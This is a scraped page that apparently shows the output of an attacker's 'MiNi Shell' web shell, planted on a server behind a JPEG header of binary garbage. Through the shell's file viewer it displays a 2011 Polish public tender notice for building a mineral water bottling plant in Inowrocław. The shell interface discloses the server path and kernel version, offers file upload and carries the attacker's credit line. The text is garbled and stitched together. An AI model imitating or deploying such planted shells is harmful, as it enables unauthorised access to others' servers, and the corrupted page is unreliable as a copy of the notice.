JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111004/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111004/261263-N-2011.html

<p class="kh_header"><b>Inowrocław: Budowa rozlewni  wód w Inowrocławiu przy ul. Miechowickiej. Zaprojektowanie i wykonanie budynku rozlewni z dostawą linii rozlewniczej i jej rozruchem.</b><br>
<b>Numer ogłoszenia: 261263 - 2011; data zamieszczenia: 04.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Wodociągów i Kanalizacji sp. z o.o. , ul. ks. B. Jaśkowskiego 14, 88-100 Inowrocław, woj. kujawsko-pomorskie, tel. 052 3574071, faks 052 3573687.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.pwik-inowroclaw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa rozlewni  wód w Inowrocławiu przy ul. Miechowickiej. Zaprojektowanie i wykonanie budynku rozlewni z dostawą linii rozlewniczej i jej rozruchem..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: 
1.1.Wykonanie projektu technicznego wraz z uzyskaniem pozwolenia na budowę obiektu Rozlewni wód w Inowrocławiu przy ul. Miechowickiej wraz z niezbędnymi instalacjami, infrastrukturą techniczną i technologiczną (m.in. drogi dojazdowe, przyłącza: elektroenergetyczne, gazowe, wod-kan oraz inne elementy niezbędne do uruchomienia rozlewni).  
1.2.Wykonanie projektu technicznego na budowę dwóch rurociągów wody mineralnej od studni S2 (dł. ok. 210m) i od studni S3 (dł. ok. 320m) do projektowanego budynku rozlewni wraz z uzyskaniem pozwolenia na budowę.
Projekty techniczne winny zawierać m.in. szczegółowy opis robót i technologii ich wykonania z podaniem obowiązujących norm, z uwzględnieniem specyfikacji technicznej wykonania i odbioru robót. Zastrzega się możliwość wprowadzenia na wniosek Zamawiającego poprawek do projektów lub uzupełnień brakujących elementów. Wszelkie poprawki i uzupełnienia na koszt Wykonawcy.
Przed rozpoczęciem procedury uzyskania pozwolenia na budowę należy uzyskać pisemną akceptację projektów technicznych przez Zamawiającego. 

Wykonawca dostarczy Zamawiającemu: 
1)projekt budowlany - 4 egz.
2)projekt wykonawczy - 2 egz. 
3)kosztorys inwestorski - 1 egz.
4)przedmiar robót - 1 egz.
5)specyfikacja techniczna wykonania i odbioru robót - 1 egz.
6)projekt organizacji ruchu - 2 egz.

Wykonawca opracuje osobny kosztorys na projekt z pkt. 1.2. 
Wszystkie ww. dokumentacje należy przekazać Zamawiającemu również w wersji elektronicznej. 

1.3.Wykonanie projektu technologicznego linii rozlewniczej.
Linia rozlewnicza winna obejmować:
-płuczkę,
-saturator,
-napełniarkę,
-zakręcarkę,
-etykietarkę,
-transportery płytkowe,
-tunel grzewczy,
-stół zbiorczy.

1.4.Budowa budynku rozlewni zgodnie z opracowanym projektem technicznym.
Wykonawca wybuduje budynek rozlewni wraz instalacjami technicznymi i technologicznymi oraz z infrastrukturą techniczną: drogami dojazdowymi, oświetleniem. Wykona przyłącza: elektroenergetyczne, gazowe i wod-kan.  
PWiK Sp. z o.o. zastrzega sobie nawiercenie przewodu wodociągowego i założenie nawiertki oraz wybudowanie rurociągów wody mineralnej do 1-szej ściany budynku rozlewni.

1.5.Dostawa i montaż linii rozlewniczej zaprojektowanej zgodnie z wymogami pkt. 1.3. umożliwiającej rozlewanie wody gazowanej i niegazowanej do butelek szklanych 0,33l i PET o pojemności 0,5l i 1,5l. Przewidywana produkcja 500 butelek / godz.
Linia rozlewnicza musi być kompletna, nowa lub po regeneracji (z pełną min. 12-to miesięczną gwarancją) oraz sprawdzona w praktyce eksploatacyjnej.

2.Przedmiot zamówienia obejmuje:
1)opracowanie koncepcji technologiczno-architektonicznej w uzgodnieniu z Zamawiającym oraz uzyskanie dla niej akceptacji Zamawiającego,
2)opracowanie kompletnej dokumentacji projektowej budowlanej i wykonawczej oraz powykonawczej,
3)opracowanie projektu zagospodarowania terenu,
4)opracowanie wniosków i uzyskanie w imieniu Zamawiającego niezbędnych pozwoleń, decyzji lub ich zmian w celu opracowania dokumentacji projektowej, wybudowania i przekazania zrealizowanych obiektów do eksploatacji zgodnie z obowiązującym prawem, a w szczególności:
a)uzyskanie pozwoleń na budowę i/lub zgłoszenie robót i wykonanie ewentualnych innych działań niezbędnych dla realizacji robót budowlanych,
b)uzyskanie pozwoleń na użytkowanie,
5)uzyskanie wszelkich niezbędnych uzgodnień, opinii, ekspertyz w celu opracowania dokumentacji projektowej, wybudowania i przekazania zrealizowanych obiektów do eksploatacji zgodnie z obowiązującymi przepisami,
6)wykonanie robót budowlanych obiektu rozlewni obejmującego pomieszczenia:
-stacji uzdatniania wody,
-rozlewni wody,
-magazynu na butelki puste, 
-magazynu gotowego produktu,
-techniczne m.in. wentylatorownia, kotłownia itp.,
-socjalne m.in. szatnia, węzeł sanitarny, stołówka, pomieszczenie biurowe itp.,
7)dostawę i montaż maszyn, urządzeń oraz instalacji linii rozlewniczej,
8)wykonanie i udokumentowanie rozruchu instalacji technologicznej,
9)opracowanie instrukcji eksploatacji maszyn, urządzeń i instalacji wraz z instrukcją zapobiegania awariom i usuwania ich skutków oraz instrukcji p.poż.
10)przeszkolenie załogi w zakresie eksploatacji wszystkich instalacji i urządzeń,
11)przekazanie do eksploatacji obiektów wchodzących w skład zamówienia wraz z całą infrastrukturą,
12)przeglądy wynikające z warunków gwarancji,
13)zagospodarowanie terenu: wykonanie dróg, parkingu, chodników, zieleni, oświetlenia oraz placu pod śmietnik,
14)uporządkowanie placu budowy,
15)obsługę geodezyjną.

3.Ogólne wytyczne dotyczące realizacji zamówienia:
1)Szczegółowy opis przedmiotu zamówienia przedstawiony został w Programie Funkcjonalno-Użytkowym stanowiącym załącznik nr 1  do SIWZ.
2)Projekt techniczny winien być zgodny z obowiązującymi przepisami, w tym techniczno-budowlanymi, obowiązującymi Polskimi Normami lub odpowiednimi normami krajów UE oraz zasadami wiedzy technicznej w sposób zapewniający spełnienie wymagań podstawowych dotyczących w szczególności: bezpieczeństwa pożarowego, bezpieczeństwa użytkowania, odpowiednich warunków higienicznych i zdrowotnych oraz ochrony środowiska, oszczędności energii i bezpieczeństwa żywności.
3)Wykonawca w terminie 1 miesiąca od podpisania umowy przedstawi zamawiającemu do jego akceptacji, szczegółową koncepcję rozwiązań technologicznych, technicznych i architektoniczno-budowlanych. Akceptacja koncepcji przez zamawiającego upoważniać będzie do kontynuacji prac projektowych.
4)Zastosowane materiały winny posiadać wysoki stopień odporności na korozję. Elementy linii technologicznej muszą posiadać niezbędne atesty na kontakt z żywnością.
5)Wszystkie prace należy wykonać zgodnie z projektem technicznym. Wszelkie odstępstwa od projektu winny być pisemnie uzgodnione z projektantem i Zamawiającym oraz  potwierdzone wpisem inspektora nadzoru do dziennika budowy.
6)Wykonawca robót zapewni pełną obsługę geodezyjną przy wykonywaniu robót.
7)Wykonawca robót jest odpowiedzialny za przestrzeganie przepisów BHP, p.poż, ochrony środowiska na placu budowy.
8)Wykonawca po wykonanych robotach uporządkuje teren budowy.
9)Wykonawca zobowiązany jest dostarczyć instrukcje eksploatacji maszyn, urządzeń i instalacji wraz z instrukcją zapobiegania awariom i usuwania ich skutków oraz instrukcją p.poż.
10)Wykonawca zobowiązany jest zgłaszać inspektorowi nadzoru i Zamawiającemu odbiory robót zanikających oraz odbiory częściowe i odbiór końcowy.
11)Odbioru końcowego robót dokona komisja Wyznaczona przez Zamawiającego w obecności inspektora nadzoru i wykonawcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienie uzupełniające zgodne z przedmiotem zamówienia podstawowego a jego wartość nie przekroczy 20% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 42.21.50.00-6, 71.00.00.00-8, 71.32.00.00-7, 45.10.00.00-8, 45.11.12.91-4, 45.21.00.00-2, 45.21.32.51-7, 45.22.32.00-8, 45.22.33.00-9, 45.23.00.00-8, 45.60.00.00-7, 45.30.00.00-0, 45.32.00.00-6, 45.33.00.00-9, 45.40.00.00-1, 42.00.00.00-6, 35.00.00.00-4, 31.00.00.00-6, 51.00.00.00-9, 80.51.10.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Składając ofertę Wykonawca zobowiązany jest wnieść wadium przetargowe w wysokości : 30.000,00 zł (słownie: trzydzieści tysięcy złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca złoży 
1). Oświadczenie z art. 22 ust. 1 PZP 
2). Oświadczenie stwierdzające, że osoby wyznaczone do kierowania robotami budowlanymi, stanowiącymi przedmiot zamówienia, posiadają wymagane uprawnienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca zrealizował w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) roboty budowlane o zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia - co najmniej 3 zamówienia polegające na budowie obiektów branży spożywczej o zbliżonej powierzchni użytkowej</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca złoży:
1). Oświadczenie z art. 22 ust. 1 PZP</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca złoży:
1). Oświadczenie z art. 22 ust. 1 PZP</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca złoży:
1). Oświadczenie z art. 22 ust. 1 PZP 
2). Polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1). Wypełniony Formularz Ofertowy;
2). Oświadczenie Wykonawcy jaką część zamówienia zamierza powierzyć podwykonawcom (jeżeli wykonawca przewiduje wykonanie przedmiotu zamówienia przy udziale podwykonawców)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pwik-inowroclaw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedsiębiorstwo Wodociągów i Kanalizacji Sp. z o.o. w Inowrocławiu ul.Ks.B.Jaśkowskiego 14, 88 - 100 Inowrocław..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.10.2011 godzina 10:00, miejsce: Przedsiębiorstwo Wodociągów i Kanalizacji Sp. z o.o. w Inowrocławiu 
ul.Ks. B. Jaśkowskiego 14, 88 - 100 Inowrocław 
sekretariat I piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> TERMIN WYKONANIA ZAMÓWIENIA: 
-Wykonanie dokumentacji projektowej: do 3 m-cy od daty podpisania umowy. 
-Uzyskanie pozwolenia na budowę: w uzgodnieniu z Zamawiającym. 
-Budowa Rozlewni wód zakończona odbiorem końcowym oraz uzyskaniem pozwolenia na użytkowanie: do 6 m-cy od uzyskania pozwolenia na budowę. 

Zamawiający zastrzega sobie prawo do odstąpienia od wykonania zamówienia na każdym etapie jego realizacji. Zamawiający pokryje wówczas koszty wykonanych prac, a stronom nie będą przysługiwały żadne roszczenia odszkodowawcze..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com